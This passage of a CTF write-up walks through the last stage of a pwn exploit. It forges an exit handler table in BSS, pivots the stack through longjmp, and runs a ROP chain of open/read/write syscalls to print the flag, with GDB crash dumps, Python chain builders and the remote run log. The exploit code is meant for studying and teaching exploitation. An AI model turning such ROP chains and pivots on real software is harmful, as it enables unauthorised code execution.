STACKPIVOT = LIBC + 0x7b1f5
RET = LIBC + 0x47ed7

# write fake exitfunc table to BSS + 0x100
prepare(0, p64(STACKPIVOT))       # rip

# overwrite entry table again
payload = p64(BSS + 0x200) + p64(0x1000)
payload += p64(0x0) + p64(BSS + 0x40)
payload += p64(0x100) + p64(0)

prepare(1, payload)

# write exitfunc argument to BSS + 0x200	
payload = p64(BSS+0x210-0x30)     # rdi
payload += p64(0x0)
payload += p64(BSS+0x220)         # rsp
payload += p64(RET)
payload += p64(0xfacebabe)        # rip

prepare(0, payload)

Program received signal SIGSEGV, Segmentation fault.
0x00000000facebabe in ?? ()
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x41414141        
$rbx   : 0x00007ffff7ffdf60  →  0x0000000041414141 ("AAAA"?)
$rcx   : 0x1               
$rdx   : 0x00005555555580f8  →  0x0000000000000000
$rsp   : 0x0000555555558228  →  0x0000000000000000
$rbp   : 0x00007ffff7fc21f5  →  <longjmp+30> mov rsp, QWORD PTR [rdi+0x30]
$rsi   : 0x0000555555556229  →  0x002172656b636168 ("hacker!"?)
$rdi   : 0x00005555555581e0  →  0x0000000000000000
$rip   : 0xfacebabe        
$r8    : 0x0               
$r9    : 0x0               
$r10   : 0x0               
$r11   : 0x246             
$r12   : 0x00005555555581e0  →  0x0000000000000000
$r13   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r14   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r15   : 0x130             
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x0000555555558228│+0x0000: 0x0000000000000000	 ← $rsp
0x0000555555558230│+0x0008: 0x0000000000000000
0x0000555555558238│+0x0010: 0x0000000000000000
0x0000555555558240│+0x0018: 0x0000000000000000
0x0000555555558248│+0x0020: 0x0000000000000000
0x0000555555558250│+0x0028: 0x0000000000000000
[!] Cannot access memory at address 0xfacebabe
────────────────────────────────────────────────────────────────────────────────────────────────────
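
The register state in this crash (rdi = BSS+0x1e0, rsp = BSS+0x228, rip = 0xfacebabe) follows directly from the five qwords written to BSS+0x200. A small model of the gadget in plain Python 3, assuming the jump target is a bare ret; `pivot` is a hypothetical name and memory is faked with a dict:

```python
def pivot(mem, rdi):
    """Model `mov rsp, [rdi+0x30]; jmp [rdi+0x38]` followed by a `ret`."""
    rsp = mem[rdi + 0x30]
    jump_target = mem[rdi + 0x38]
    # assumption: jump_target is a plain `ret`, which pops the next rip
    rip = mem[rsp]
    rsp += 8
    return jump_target, rip, rsp


BSS = 0x555555558000
RET = 0x7ffff7f47000 + 0x47ed7

# the payload written to BSS+0x200, one qword per entry
qwords = [
    BSS + 0x210 - 0x30,  # exitfunc argument -> rdi
    0x0,
    BSS + 0x220,         # [rdi+0x30] -> new rsp
    RET,                 # [rdi+0x38] -> jump target
    0xfacebabe,          # first entry of the ropchain
]
mem = {BSS + 0x200 + 8 * i: q for i, q in enumerate(qwords)}

rdi = mem[BSS + 0x200]
jump_target, rip, rsp = pivot(mem, rdi)
print(hex(rdi), hex(rip), hex(rsp))
```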

What a journey, but finally we’re ropping :)

So, all that’s left now, is to open/read/write the flag via our ropchain.

POPRAX = LIBC + 0x0000000000016a96
POPRDI = LIBC + 0x00000000000152a1
POPRSI = LIBC + 0x000000000001dad9
POPRDX = LIBC + 0x000000000002cdae
SYSCALL = LIBC + 0x00000000000238f0

# write exitfunc argument to BSS + 0x200		
payload = p64(BSS+0x210-0x30)   # rdi
payload += p64(0x0)
payload += p64(BSS+0x220)       # rsp
payload += p64(RET)

# open("./flag", 0, 0)
payload += p64(POPRAX)
payload += p64(2)
payload += p64(POPRDI)
payload += p64(BSS+0x200+0x200)
payload += p64(POPRSI)
payload += p64(0)
payload += p64(POPRDX)
payload += p64(0)
payload += p64(SYSCALL)

# read(3, BSS+0x400, 100)
payload += p64(POPRAX)
payload += p64(0)
payload += p64(POPRDI)
payload += p64(3)
payload += p64(POPRSI)
payload += p64(BSS+0x200+0x200)
payload += p64(POPRDX)
payload += p64(100)
payload += p64(SYSCALL)

# write(1, BSS+0x400, 100)
payload += p64(POPRAX)
payload += p64(1)
payload += p64(POPRDI)
payload += p64(1)
payload += p64(POPRSI)
payload += p64(BSS+0x200+0x200)
payload += p64(POPRDX)
payload += p64(100)
payload += p64(SYSCALL)

payload = payload.ljust(0x200, "\x00")
payload += "./flag\x00"

prepare(0, payload)

exit will now trigger the ropchain and print the flag.
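
All three syscalls in the chain share the same shape, so the chain could also be generated by a small helper. The following is a sketch in plain Python 3 without pwntools: `q` and `syscall_chain` are hypothetical names, the gadget offsets are the ones listed above, and it assumes (as the chain above implies) that each pop gadget ends in ret and that the syscall gadget returns as well.

```python
import struct

LIBC = 0x7ffff7f47000  # libc base from the local run
BSS = 0x555555558000   # bss address from the local run

GADGETS = {
    "pop_rax": LIBC + 0x16a96,
    "pop_rdi": LIBC + 0x152a1,
    "pop_rsi": LIBC + 0x1dad9,
    "pop_rdx": LIBC + 0x2cdae,
    "syscall": LIBC + 0x238f0,
}


def q(value):
    """Pack one little-endian qword (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


def syscall_chain(nr, rdi, rsi, rdx):
    """Build the 9 qwords that set rax/rdi/rsi/rdx and hit the syscall gadget."""
    words = (
        GADGETS["pop_rax"], nr,
        GADGETS["pop_rdi"], rdi,
        GADGETS["pop_rsi"], rsi,
        GADGETS["pop_rdx"], rdx,
        GADGETS["syscall"],
    )
    return b"".join(q(w) for w in words)


FLAG_BUF = BSS + 0x200 + 0x200  # holds "./flag" first, later the flag itself

chain = syscall_chain(2, FLAG_BUF, 0, 0)     # open("./flag", 0, 0)
chain += syscall_chain(0, 3, FLAG_BUF, 100)  # read(3, buf, 100)
chain += syscall_chain(1, 1, FLAG_BUF, 100)  # write(1, buf, 100)

print(len(chain))
```

Together with the four leading qwords of the payload, the chain stays well below the 0x200 bytes at which the "./flag" string is placed.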

Due to the offset finder, the exploit takes quite some time to execute remotely: depending on the random gap between bss and heap, it needs 300-20000 requests to find the correct offset to the heap.

Since there were only challenge servers in China available at first and the connection was extremely slow, it would have taken hours to run.

Thanks to the organizers here for setting up a challenge server in Hong Kong after we pointed out the slow connection. Connecting to that one via an AWS instance, the exploit ran a lot smoother and finished in about 5 minutes.

[*] Test: 0x104b068
[*] Test: 0x104c068
[*] Test: 0x104d068
[*] Test: 0x104e068
[*] HEAP offset     : 0x104e060
[*] HEAP leak       : 0x5559e56c20b8
[*] HEAP base       : 0x5559e56c2000
[*] BSS             : 0x5559e4673000
[*] ELF             : 0x5559e466f000
[*] LIBC leak       : 0x7fa4e4e1df10
[*] LIBC            : 0x7fa4e4da9000
[*] Switching to interactive mode
hacker!n1ctf{U_Ar3_RE41LY_M43TeR_0f_Mus1!}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$  
n1ctf{U_Ar3_RE41LY_M43TeR_0f_Mus1!}

Not so sure about that, but thanks ;-)